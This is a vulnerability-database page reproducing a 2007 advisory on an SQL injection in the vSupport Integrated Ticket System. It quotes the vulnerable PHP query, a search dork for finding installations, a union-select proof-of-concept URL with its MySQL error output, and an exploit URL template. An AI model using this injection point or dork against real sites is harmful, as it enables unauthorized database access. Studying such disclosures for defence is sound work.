Lucene search

K

vsupportits-sql.txt

🗓️ 11 Jun 2007 00:00:00Reported by rUnViRuSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

vSupport Integrated Ticket System SQL injection vulnerability. Allows unauthorized database access

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`+--------------------------------------------------------------------  
+  
+ Affected Software .: vSupport Integrated Ticket System  
+ Venedor ...........: http://www.cmgsccc.com   
+ Class .............: SQL injection  
+ Dork ..............: inurl:vBSupport.php  
+ Found by ..........: rUnViRuS  
+ Original advisory .: http://www.sec-area.com/  
+ Contact ...........: stormhacker[at]hotmail[.]com  
+  
+--------------------------------------------------------------------  
+ PoC:  
+  
+ Database error SQL  
+--------------------------------------------------------------------  
// do not limit the users access  
$fromuseraccess = "";  
}  
  
// get the info about the ticket first  
if ($ticket = $db->query_first("  
SELECT ticket.*  
" . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "  
FROM " . TABLE_PREFIX . "ticket as ticket  
" . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "  
WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "  
$fromuseraccess  
"))  
{  
  
  
+--------------------------------------------------------------------  
+ An example:  
+--------------------------------------------------------------------  
  
http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/  
  
+--------------------------------------------------------------------  
+ output:  
+--------------------------------------------------------------------  
  
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5  
Error Number : 1064  
  
  
Date : Monday, July 2nd 2007 @ 02:54:54 PM  
Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/  
Referrer :   
IP Address : 127.0.0.1  
Username : admin  
Classname : vb_database  
Invalid SQL:  
  
SELECT ticket.*  
,icon.title AS icontitle, icon.iconpath  
FROM ticket as ticket  
LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)  
WHERE ticketid=1/**/union/**/select/**/;  
+--------------------------------------------------------------------  
+ Exploit :  
+--------------------------------------------------------------------  
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]  
  
+--------------------------------------------------------------------  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+--------------------------------------------------------------------  
+ [W]orld [D]efacers [T]eam  
+ Greets:  
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||  
+ || Pro Hacker || - || DARKFIRE ||  
+  
+-------------------------[ W D T ]----------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report